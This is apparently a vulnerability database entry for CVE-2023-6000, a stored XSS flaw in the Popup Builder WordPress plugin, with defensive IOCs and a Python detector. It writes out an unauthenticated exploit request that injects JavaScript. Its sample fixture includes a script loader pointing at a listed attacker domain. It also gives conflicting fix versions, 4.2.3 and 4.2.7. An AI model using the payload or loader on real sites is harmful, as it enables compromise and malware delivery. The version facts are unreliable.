cbcvebase.
CVE-2023-6000
published 2024-01-01

CVE-2023-6000: The Popup Builder WordPress plugin before 4.2.3 does not prevent simple visitors from updating existing popups, and injecting raw JavaScript in them, which…

Priority: P181
Severity: medium, CVSS 3.1 base score 6.1
Vector: AV:N / AC:L / PR:N / UI:R / S:C / C:L / I:L / A:N
Flags: ITW, EXPLOIT, VulnCheck KEV (exploited in the wild)
EPSS: 2.00% (percentile 78.3)
The Popup Builder WordPress plugin before 4.2.3 does not prevent simple visitors from updating existing popups, and injecting raw JavaScript in them, which could lead to Stored XSS attacks.

Affected (2 ranges)

Vendor     Product         Version range   Fixed in
google     chrome_chrome   (not listed)    (not listed)
sygnoos    popup_builder   < 4.2.3         4.2.3

Detection & IOCs (extracted from sources)

domain:   ttincoming.traveltraffic[.]cc
domain:   host.cloudsonicwave[.]com
url:      hxxp://ttincoming.traveltraffic[.]cc/?traffic
filename: wp-felody.php
path:     wp-blog-header.php
command:  sgpb-is-preview=1&post_ID={{popup_id}}&sgpb-type=html&sgpb-WillOpen=alert('document.domain');
other:    fofa-query: body="/wp-content/plugins/popup-builder"
other:    publicwww-query: "/wp-content/plugins/popup-builder/"
  • Monitor the 'wp_postmeta' database table for malicious JavaScript injected via Popup Builder's Custom JavaScript or Custom CSS sections.
  • Detect malicious event handler injections targeting Popup Builder plugin events: 'sgpb-ShouldOpen', 'sgpb-ShouldClose', 'sgpb-WillOpen', 'sgpbDidOpen', 'sgpbWillClose', and 'sgpb-DidClose'.
  • Detect exploitation attempts via unauthenticated POST requests containing 'sgpb-is-preview=1' and 'sgpb-WillOpen' parameters with JavaScript payloads.
  • Look for the presence of the rogue plugin file 'wp-felody.php' on the filesystem, which serves as the main backdoor dropped after initial compromise.
  • Check for unauthorized modifications to wp-blog-header.php as a secondary infection indicator used to inject the JavaScript backdoor.
  • Detect the 'sgpbWillOpen' event being hijacked in the site's database as an indicator of Balada Injector compromise.
  • Alert on admin-related cookie checks in injected scripts, which attackers use to load additional script sets for backdoor deployment.
  • The vulnerability affects Popup Builder versions 4.2.3 and older; version 4.2.7 is the patched release addressing CVE-2023-6000.
  • At least 80,000 active sites still use Popup Builder 4.1 and older, meaning the attack surface remains large and scanning for vulnerable installs is warranted.
  • Infection removal requires deleting malicious entries from Popup Builder's custom sections AND scanning for hidden backdoors to prevent reinfection.
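The detection items above describe three checks a site owner or SOC can run: flag unauthenticated POST requests that combine sgpb-is-preview=1 with JavaScript in an sgpb-* event parameter, scan wp_postmeta for Popup Builder event hooks carrying script, admin cookie checks or the listed IOC domains, and look for the rogue wp-felody.php file. The following is an added example (not code from this database or from the plugin) that implements those checks over constructed sample data; the request dict layout, the postmeta row layout and the meta_key names in the samples are assumptions made for the demo.

```python
import re
from urllib.parse import parse_qs

# Popup Builder lifecycle hooks named in the detection guidance above.
SGPB_EVENTS = ("sgpb-ShouldOpen", "sgpb-ShouldClose", "sgpb-WillOpen",
               "sgpbDidOpen", "sgpbWillClose", "sgpb-DidClose", "sgpbWillOpen")
# Parameters the preview request legitimately carries; not payload carriers.
CONTROL_PARAMS = {"sgpb-is-preview", "sgpb-type", "post_ID"}
# IOC domains from the list above, kept defanged and refanged at match time.
IOC_DOMAINS = {"ttincoming.traveltraffic[.]cc", "host.cloudsonicwave[.]com"}
ROGUE_FILES = {"wp-felody.php"}

# Cheap heuristics for "this value is JavaScript, not CSS or plain text".
JS_HINTS = re.compile(
    r"alert\s*\(|<script|eval\s*\(|document\.|fromCharCode|atob\s*\(|location\.",
    re.IGNORECASE)
# Injected scripts that branch on an admin-related cookie (guidance item above).
ADMIN_COOKIE_CHECK = re.compile(
    r"document\.cookie[^;]{0,200}admin|admin[^;]{0,200}document\.cookie",
    re.IGNORECASE | re.DOTALL)


def refang(value: str) -> str:
    """Turn the defanged IOC notation used above into matchable text."""
    return value.replace("[.]", ".").replace("hxxp", "http")


def is_exploit_request(req: dict) -> bool:
    """True for an unauthenticated POST that sets sgpb-is-preview=1 and puts
    JavaScript into an sgpb-* event parameter. req has keys method, body and
    authenticated (assumed layout; the web server log parser would fill it)."""
    if req["method"].upper() != "POST" or req.get("authenticated", False):
        return False
    params = parse_qs(req.get("body", ""), keep_blank_values=True)
    if params.get("sgpb-is-preview", [""])[0] != "1":
        return False
    return any(
        key.startswith("sgpb") and key not in CONTROL_PARAMS
        and any(JS_HINTS.search(v) for v in values)
        for key, values in params.items())


def scan_postmeta(rows):
    """Return (post_id, meta_key, reasons) for wp_postmeta rows whose value
    carries script in a Popup Builder event hook, an admin cookie check, or a
    known IOC domain. rows are dicts with post_id/meta_key/meta_value."""
    hits = []
    for row in rows:
        value = row["meta_value"]
        reasons = []
        if any(ev in value for ev in SGPB_EVENTS) and JS_HINTS.search(value):
            reasons.append("event hook carries script")
        if ADMIN_COOKIE_CHECK.search(value):
            reasons.append("admin cookie check")
        if any(refang(d) in refang(value) for d in IOC_DOMAINS):
            reasons.append("known IOC domain")
        if reasons:
            hits.append((row["post_id"], row["meta_key"], tuple(reasons)))
    return hits


def find_rogue_files(paths):
    """Return paths whose basename is one of the rogue plugin files above."""
    return [p for p in paths if p.rsplit("/", 1)[-1] in ROGUE_FILES]


# Constructed sample input: one exploit-shaped request, one authenticated
# preview, one ordinary GET; post_ID 1234 is a made-up popup id.
SAMPLE_REQUESTS = [
    {"method": "POST", "authenticated": False,
     "body": "sgpb-is-preview=1&post_ID=1234&sgpb-type=html"
             "&sgpb-WillOpen=alert('document.domain');"},
    {"method": "POST", "authenticated": True,
     "body": "sgpb-is-preview=1&post_ID=1234&sgpb-type=html"
             "&sgpb-WillOpen=alert('document.domain');"},
    {"method": "GET", "authenticated": False, "body": ""},
]

# Constructed wp_postmeta rows; meta_key names are placeholders, not the
# plugin's real keys.
SAMPLE_POSTMETA = [
    {"post_id": 1234, "meta_key": "popup_custom_js",
     "meta_value": "sgpbWillOpen: var s=document.createElement('script');"
                   "s.src='hxxp://ttincoming.traveltraffic[.]cc/?traffic';"},
    {"post_id": 1234, "meta_key": "popup_custom_js",
     "meta_value": "if(document.cookie.indexOf('admin')!==-1){loadMore();}"},
    {"post_id": 77, "meta_key": "popup_custom_css",
     "meta_value": ".sgpb-popup{color:red}"},
]

if __name__ == "__main__":
    print([is_exploit_request(r) for r in SAMPLE_REQUESTS])
    for hit in scan_postmeta(SAMPLE_POSTMETA):
        print(hit)
    print(find_rogue_files(["/srv/wp/wp-content/plugins/wp-felody.php",
                            "/srv/wp/wp-blog-header.php"]))
```

The request check deliberately ignores authenticated sessions, matching the guidance that the exploit traffic is unauthenticated; legitimate popup editing by an administrator can carry script too. The postmeta scan reports every reason that fired so an analyst can distinguish a hijacked event hook from a loader that only gates on an admin cookie.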

CVSS provenance

Source     Version   Score   Severity   Vector
nvd        v3.1      6.1     MEDIUM     CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
vulncheck  -         6.1     MEDIUM     -